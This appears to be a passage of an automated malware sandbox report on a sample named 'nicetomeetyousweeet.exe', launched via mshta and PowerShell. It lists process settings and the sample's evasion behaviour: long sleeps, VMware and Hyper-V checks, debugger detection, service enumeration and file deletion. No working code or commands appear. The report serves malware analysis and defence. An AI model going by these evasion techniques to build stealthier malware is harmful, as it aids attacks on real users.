                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0040E54F Sleep,ExitProcess, 6_2_0040E54F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0078E7B6 Sleep,ExitProcess, 6_2_0078E7B6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 6_2_004198C2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 6_2_00799B29
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6818
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2632
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Window / User API: threadDelayed 5779
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Window / User API: threadDelayed 4163
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dll
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe API coverage: 5.5 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep count: 6818 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308 Thread sleep count: 2632 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228 Thread sleep count: 5779 > 30
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228 Thread sleep time: -17337000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228 Thread sleep count: 4163 > 30
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe TID: 4228 Thread sleep time: -12489000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 6_2_0040B335
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 6_2_0041B42F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 6_2_0040B53A
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 6_2_004089A9
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00406AC2 FindFirstFileW,FindNextFileW, 6_2_00406AC2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 6_2_00407A8C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW, 6_2_00418C69
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 6_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0078900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 6_2_0078900E
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0078B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 6_2_0078B59C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0079B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 6_2_0079B696
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00787CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 6_2_00787CF3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00786D29 FindFirstFileW,FindNextFileW, 6_2_00786D29
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00798ED0 FindFirstFileW, 6_2_00798ED0
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 6_2_00406F06
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: Amcache.hve.9.dr Binary or memory string: VMware
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
                Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: mshta.exe, 00000000.00000003.1712558385.000000000709B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 00000003.00000002.1824736094.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: nicetomeetyousweeet.exe, 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
                Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: mshta.exe, 00000000.00000003.1712558385.000000000709B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
                Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: powershell.exe, 00000003.00000002.1814970381.000000000294E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
                Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
                Source: powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx?e
                Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe API call chain: ExitProcess graph end node graph_6-85760
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0043A65D
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 6_2_0041BCE3
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00442554 mov eax, dword ptr fs:[00000030h] 6_2_00442554
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_005B0083 push dword ptr fs:[00000030h] 6_2_005B0083
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_007C27BB mov eax, dword ptr fs:[00000030h] 6_2_007C27BB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0078092B mov eax, dword ptr fs:[00000030h] 6_2_0078092B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00780D90 mov eax, dword ptr fs:[00000030h] 6_2_00780D90
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0044E92E GetProcessHeap, 6_2_0044E92E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00434168
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe Code function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0043A65D
